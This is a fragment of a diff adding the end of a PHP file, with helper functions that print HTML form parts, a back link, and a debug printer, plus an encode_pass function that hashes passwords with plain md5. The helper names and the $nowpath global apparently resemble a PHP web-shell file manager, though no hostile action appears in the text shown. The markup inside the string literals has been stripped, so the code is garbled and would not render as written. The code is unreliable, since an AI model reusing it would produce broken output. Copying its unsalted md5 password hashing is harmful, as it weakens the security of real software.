          '); + } +} + +function maketext($arg = array()){ + !$arg['cols'] && $arg['cols'] = 100; + !$arg['rows'] && $arg['rows'] = 25; + $arg['title'] = $arg['title'] ? $arg['title'].'
          ' : ''; + p("

          $arg[title]

          "); +} + +function formfooter($name = ''){ + !$name && $name = 'submit'; + p('

          '); + p('
          '); +} + +function goback(){ + global $self, $nowpath; + p('

          '); +} + +function formfoot(){ + p(''); +} + +function encode_pass($pass) { + $pass = md5($pass); + return $pass; +} + +function pr($s){ + echo "
          ".print_r($s).'
          '; +} + +?> \ No newline at end of file